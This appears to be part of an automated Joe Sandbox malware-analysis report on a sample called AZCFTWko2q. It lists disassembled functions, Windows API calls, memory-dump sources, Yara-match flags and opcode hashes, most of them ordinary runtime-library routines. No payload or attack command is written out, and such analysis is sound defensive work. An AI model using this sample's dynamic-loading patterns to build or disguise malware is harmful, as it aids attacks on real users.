                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                                      • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                                      • Instruction ID: 73fb14bf46affd44553376bb7457c92806cb5da7ee928c3ed9e21d26ebe8384a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A218EB1908711BFE7106FA49C0CA5ABBECEF05B16F004A2BF555E7601CBBC94418BA8
                                                                                                                                                                                                                                                                                      Function 024D24A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 024D2507
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID: kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                                      • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c0b1af4cbb45f53d4af35301b3a4d0a01a6ffc55bc56d525216210f7e756bb0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 881182759003117FE711BB75AC7DE6B7BACEE05B12720052BFC01E3292EBB9D5018A69
                                                                                                                                                                                                                                                                                      Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                                                                                                                                                                                                        • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                                      • String ID: pContext$switchState
                                                                                                                                                                                                                                                                                      • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                                                                      • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                                      • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                                                                      Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                                                                      • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                                                                        • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                                                                        • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: eventObject
                                                                                                                                                                                                                                                                                      • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                                                      • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                                      • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                                                                      Function 024E0C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 024E0C36
                                                                                                                                                                                                                                                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024E0C9D
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024E0CBA
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024E0D20
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024E0D35
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024E0D47
                                                                                                                                                                                                                                                                                      • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024E0D75
                                                                                                                                                                                                                                                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024E0D80
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024E0DAC
                                                                                                                                                                                                                                                                                      • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024E0DBC
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3720063390-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                                      • Instruction ID: 068c6d76c028913e8500f7a1a7223212d1b0cd20cf8b446a062c3265e314c682
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A341B330A042049BEF19FFA6C564BED77A6AF01305F1450AFD8177B282CBB59A09CF61
                                                                                                                                                                                                                                                                                      Function 024F204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2061
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F206D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2078
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2083
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F208E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F2099
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20A4
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20AF
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20BA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F20C8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                                      • Instruction ID: fef946d97ea5793219a416530691ae89fb4231b3207a572331b6c2269a2de75d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE117476600149AFDB91EF56C841CD93FA6EF44750B5140AABA098F221DB71EE609F90
                                                                                                                                                                                                                                                                                      Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                                      • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                                                                      Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __cftoe
                                                                                                                                                                                                                                                                                      • String ID: F(@$F(@
                                                                                                                                                                                                                                                                                      • API String ID: 4189289331-2038261262
                                                                                                                                                                                                                                                                                      • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                                      • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                                                                                                                                                                                                      Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                                                      • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                                      • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                                                                                                                                                                                                      Function 024F3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                                      • Instruction ID: 53fe295e8d7c1c913dc3419ef71c61c93b0402730f2f3e856031721ee509452d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CC1E270E04389AFDF52DFA9C840BAEBFB1AF89315F04419AE615AB391C7709941CF61
                                                                                                                                                                                                                                                                                      Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: fB$csm
                                                                                                                                                                                                                                                                                      • API String ID: 1170836740-1586063737
                                                                                                                                                                                                                                                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                                      • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                                                                                                                                                                                                      Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                                                                                                                                                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                                                                                                                                                                                                      • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                                                                                                                                                                                                      • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                                                      • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                                                                      • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                                                                      • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                                      • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                                                                                                                                                                                                      Function 024DC6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • atomic_compare_exchange.LIBCONCRT ref: 024DC6DC
                                                                                                                                                                                                                                                                                      • atomic_compare_exchange.LIBCONCRT ref: 024DC700
                                                                                                                                                                                                                                                                                      • std::_Cnd_initX.LIBCPMT ref: 024DC711
                                                                                                                                                                                                                                                                                      • std::_Cnd_initX.LIBCPMT ref: 024DC71F
                                                                                                                                                                                                                                                                                        • Part of subcall function 024C1370: __Mtx_unlock.LIBCPMT ref: 024C1377
                                                                                                                                                                                                                                                                                      • std::_Cnd_initX.LIBCPMT ref: 024DC72F
                                                                                                                                                                                                                                                                                        • Part of subcall function 024DC3EF: __Cnd_broadcast.LIBCPMT ref: 024DC3F6
                                                                                                                                                                                                                                                                                      • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024DC73D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                                                                      • String ID: t#D
                                                                                                                                                                                                                                                                                      • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                                                                      • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d759f5225e069a456697f62c3be3bbee96de026bff47f4d4e7fd28e880ef105
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8101F775900605A7DB11BB65CDD5B9EB35ABF00314F24011BE81997780DBB8EA15CFD2
                                                                                                                                                                                                                                                                                      Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00432324
